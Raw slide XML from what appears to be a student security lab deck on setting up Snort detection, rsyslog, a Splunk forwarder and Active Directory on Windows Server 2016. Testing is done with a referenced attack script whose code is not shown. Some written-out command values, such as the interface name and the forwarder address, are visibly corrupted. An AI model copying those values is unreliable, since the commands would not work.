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6604" y="9247756"/>
            <a:ext cx="23875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adot8/metro" TargetMode="Externa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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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2.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide22.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide23.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2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erver-world.info/en/note?os=Ubuntu_22.04&amp;p=realmd" TargetMode="External"/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dministrator@SWAP-ANTON.LOCAL" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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5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adot8/metro" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide26.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide28.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide29.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide30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%40dannyopara/installing-splunk-enterprise-on-ubuntu-step-by-step-guide-b545982038c3" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=z454piFK8W4" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linkedin.com/pulse/how-install-set-up-rsyslog-server-linux-ubuntu-20041-akshay-sharma" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.server-world.info/en/note?os=Ubuntu_22.04&amp;p=realmd" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/adot8/metro" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.snort.org/rules/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/chrisjd20/Snorpy" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rickroll.it/rickroll.mp4" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.jpg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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snort.org/rules/" TargetMode="Externa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9609" y="457200"/>
            <a:ext cx="6621780" cy="9142095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6621780" h="9142095">
                <a:moveTo>
                  <a:pt x="6621780" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9142095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6621780" y="9142095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6621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35176" y="5306948"/>
            <a:ext cx="4919345" cy="16402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"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4200" spc="-29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42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-21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42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-170">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Final </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4200" spc="-114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RELOADED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&gt;:)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61009" y="457200"/>
            <a:ext cx="228600" cy="9142095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="228600" h="9142095">
                <a:moveTo>
                  <a:pt x="228600" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9142095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228600" y="9142095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286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35176" y="8766759"/>
            <a:ext cx="3110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Anthony</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1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Johnson</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1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Swapon</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1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Dhar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388910"/>
            <a:ext cx="5932170" cy="154813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Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-114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Testing: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700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-60">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>After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configuring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rule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adding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our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rule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snort.conf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file,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conducted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thorough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testing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ensure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effectiveness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of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all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custom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rules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created.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This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involved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simulating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each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attack scenario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verify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that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Snort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generated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alerts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appropriately.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started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snort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 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-30" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>snort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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-30" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>l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/var/log/snort/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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>A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console</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-50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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>q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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="65" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>c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/etc/snort/snort.conf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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>I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ens1C0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fired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off </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>some attacks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170">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-50" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>METRO</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>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bash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script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that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Anton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wrote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project </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(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https://github.com/adot8/metro</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-30"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44880"/>
            <a:ext cx="4902200" cy="14663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4050791"/>
            <a:ext cx="2870200" cy="8760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5041900"/>
            <a:ext cx="2698369" cy="18376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6995134"/>
            <a:ext cx="5260975" cy="2109597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06998"/>
            <a:ext cx="5961380" cy="118046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80">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Enabling</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-12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Configuring</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-12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Rsyslog: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700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495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enabled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started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rsyslog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service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215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sudo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systemctl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enable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rsyslog</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>,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uncommented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TCP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UDP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reception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lines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configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-60">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> file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located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at </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>/etc/rsyslog.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>,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included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line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create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folder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syslog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client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based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its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IP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address.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also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opened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ports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514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both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transport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protocols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host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firewall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command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sudo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ufw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allow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514/tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-1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640237"/>
            <a:ext cx="5745480" cy="154940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Installing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2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Configuring</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-12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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10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Forwarder:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="490"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-60">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Like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server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setup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with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starting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service</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> and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accepting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license,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95">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="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installed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forwarder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Ubuntu2.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added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server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forwarder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</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="12700" marR="52705">
              <a:lnSpc>
                <a:spcPct val="109500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-20" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>./splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-3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add</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="15" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-60" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>forward-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-55" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="20" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-85" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>132.1C8.1.100:3337</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-85">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="110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Additionally,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-95">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="1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configured</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="2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3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forwarder</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="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to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>monitor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Apache2,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Snort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alerts,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and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syslog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logs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using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command </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>./splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5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add</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-40" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> monitor</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-3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&lt;log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-20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location&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>.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Source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names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each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log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were </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>added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</a:t>
            </a:r>
            <a:endParaRPr sz="11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30" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>/opt/splunkforwarder/etc/apps/search/local/inputs.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="215" b="1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file.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00579"/>
            <a:ext cx="4842891" cy="17964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12691"/>
            <a:ext cx="3291078" cy="16503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7303046"/>
            <a:ext cx="5223891" cy="167322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100743"/>
            <a:ext cx="5964555" cy="99631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Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10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Automation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-11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Script: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500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>To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ease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process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running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Snort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Splunk,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created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simple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bash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script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that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could</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="50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execute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both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commands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single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command.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This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script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added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cronjob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ensure </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-70">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>it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ran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automatically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boot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by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running</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="160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crontab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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-95" b="1" i="1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followed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by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@reboot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sudo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(name_of_script)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4880"/>
            <a:ext cx="3656584" cy="31783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210555"/>
            <a:ext cx="3375660" cy="32528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8586469"/>
            <a:ext cx="2679700" cy="63690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85800"/>
            <a:ext cx="5911850" cy="1503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000" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Setting</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-19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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>up</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-18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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Active</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-18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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-19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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>services</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-20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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>on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E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-17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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>2016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Installing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Active</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-114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Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DNS:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="135890">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="490"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>First,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accessed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Server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Manager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from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Start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menu.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Navigating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 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-20" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Manage</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>,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selected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 b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Add </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Roles</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-7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and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-65" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-30" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Features</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-85" b="1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get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setup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process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started.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4924526"/>
            <a:ext cx="5938520" cy="39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chose</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> the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default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installation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type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being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role-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>based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or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feature-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>based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installation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chose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server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where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wanted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Active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Directory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installed,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being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server,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were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using.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03932"/>
            <a:ext cx="5943600" cy="2343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31828"/>
            <a:ext cx="4749800" cy="3403587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908659"/>
            <a:ext cx="5940425" cy="575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0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selected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Active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Directory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Domain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Services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80" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-90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Server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roles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from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list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available </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>roles.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After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being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prompted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add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any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additional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features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clicked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13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“Add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Features”</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-13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then </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>clicked</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-15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“Next”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at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the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="14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AD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90">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DS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page.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98675"/>
            <a:ext cx="4692650" cy="3377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76926"/>
            <a:ext cx="3111500" cy="33337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694912"/>
            <a:ext cx="5683250" cy="6794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continued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Post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deployment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configuration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by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clicking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“Promote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this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server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60" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>to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50" b="1" i="1"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0" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>domain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controller”</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-1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35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Next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created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new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forest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named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it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SWAP-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ANTON.local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4880"/>
            <a:ext cx="3741420" cy="26718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88179"/>
            <a:ext cx="5443474" cy="17899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393230"/>
            <a:ext cx="3867785" cy="241223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908659"/>
            <a:ext cx="5615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then</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-70">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> left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all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other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options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default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Domain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Controller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Options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page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put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our </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>password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for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the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="1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Directory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Services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Restore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Mode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(DSRM).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002250"/>
            <a:ext cx="5460365" cy="39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dirty="0" sz="1100" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Reviewing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configuration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summary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verify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settings,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clicked </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Install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initiate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 spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>installation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process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and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waited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that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bad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boy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finish.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99641"/>
            <a:ext cx="4419600" cy="3225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10784"/>
            <a:ext cx="4356100" cy="306006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06998"/>
            <a:ext cx="5946140" cy="99631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Adding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Organizational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Units,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-12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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Groups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Users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500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495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accessed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Active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Directory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Users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and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Computers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by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navigating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Tools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selecting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it.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Then,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right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clicked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our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domain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chose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New,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followed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by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 b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Organizational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Unit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>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where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we</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="5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provided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name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for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OU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17192"/>
            <a:ext cx="5943600" cy="2374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92777"/>
            <a:ext cx="4622800" cy="33020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765016"/>
